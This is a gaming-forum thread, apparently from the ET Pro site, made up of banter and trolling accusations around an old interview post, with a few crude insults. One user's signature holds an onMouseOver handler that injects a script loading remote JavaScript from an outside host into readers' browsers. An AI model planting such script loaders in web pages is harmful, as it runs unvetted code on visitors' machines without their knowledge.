2/21/04 X-Cast interview with Bani and Rain

Official ET Pro announcements here...

Moderators: Forum moderators, developers

gotenks

Post by gotenks »

yes mommy
My Website
After a night of binge drinking:
=FF=im2good4u wrote:WTF wanst i on top ?
Tavington

Post by Tavington »

gotenks wrote:yes mommy
If anything, it's Daddy.

And less of your lip, boy.
gotenks

Post by gotenks »

just had a few questions for you...
1. why did you revive a 5 month old post to say that?
2. how old are you?
3. don't you think that most of the totally public questions get screened in x-casts?
4. were you actually serious?
My Website
After a night of binge drinking:
=FF=im2good4u wrote:WTF wanst i on top ?
Smokey

Post by Smokey »

Don't waste your time Gotenks, just another troll trying to find a new cave after the last banning.

I'm sure, as ever, your grasp of logical and reasoned debate will be a great merit to this forum. :roll:
Tavington

Post by Tavington »

Thanks Gotenks for showing an interest. Here's my response to your questions:

1. I revived this thread because although it's a few months old, it's still highly relevant. Most of the new threads that have been posted here recently are about coding stuff. I'm interested in what makes this site tick. This thread is also a very good example of the kind of culture you guys have around here.

2. I'm 32 years old. I see from your website that you are 25. That makes me 7 years older, old enough to have learned a few things about the world and the people in it.

3. It quite possibly is the case that most of the public questions in X-Cast interviews are screened. But regardless, I'm talking about what goes on HERE, on these forums. Remember that these forums can be viewed by ANYONE, not just Bani's team members and their friends. And that's how it should be.

4. I'm very serious. I don't waste time trolling web sites just to incite a response for no reason. I know that's probably what you're used to, but that ain't me. I'm a ET player and mod-maker myself, and I'm interested in the future of the gaming community.

Which leads me on to Smokey's remarks. Smokey - I would suggest you keep quiet unless you're absolutely sure you know what you're talking about. As I've said to Gotenks, I'm not a troll. And if you still don't believe me, visit the Jolt forums at:

http://forums.jolt.co.uk/forumdisplay.php?f=515

and ask a respected regular there like Stotty, or the moderator DaveGod, about recent posts made by 'Dazzy Boy' - that's my nickname. They'll tell you I'm for real.
Smokey

Post by Smokey »

Tavington wrote: Which leads me on to Smokey's remarks. Smokey - I would suggest you keep quiet unless you're absolutely sure you know what you're talking about. As I've said to Gotenks, I'm not a troll. And if you still don't believe me, visit the Jolt forums at:

and ask a respected regular there like Stotty, or the moderator DaveGod, about recent posts made by 'Dazzy Boy' - that's my nickname. They'll tell you I'm for real.
Well, I was going to leave it at my original post, but as you decided to be condescending... I am fully aware of what occured thankyou and stand by my previous statement.

I suspect the viewing audience will shortly find out why you were banned last time round.
Rain

Post by Rain »

I'm not even certain what your original post was referring to.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
STOTTYD

Post by STOTTYD »

Tavington wrote:and ask a respected regular there like Stotty
I always knew you respected me :oops:

p.s. I love you.
bani
Site Admin

Re: A rebuke

Post by bani »

Tavington wrote:Ok what the hell is this? A playground? :shock:
yes, its mine. :roll:
Grim|EFG

Post by Grim|EFG »

Oh wow.... Tavington/Daz trolling another forum. There's a suprise. :roll:
Spoofeh

Re: A rebuke

Post by Spoofeh »

There's no escaping the team speak conspiracy. :lol:
DG

Post by DG »

Tavington wrote: Which leads me on to Smokey's remarks. Smokey - I would suggest you keep quiet unless you're absolutely sure you know what you're talking about. As I've said to Gotenks, I'm not a troll. And if you still don't believe me, visit the Jolt forums at:

He's not a troll.

He's too shit at it.
Etnies`

Post by Etnies` »

1. someone swore blind to me bani was a girl.. should of known. lol
2. why bunny?
3. why is she denying having a lisp bet shes lonely.
fretn

Post by fretn »

4. why are you so late ?
Day by day : http://w.twwwo.be/
Etnies`

Post by Etnies` »

because i wasnt on time?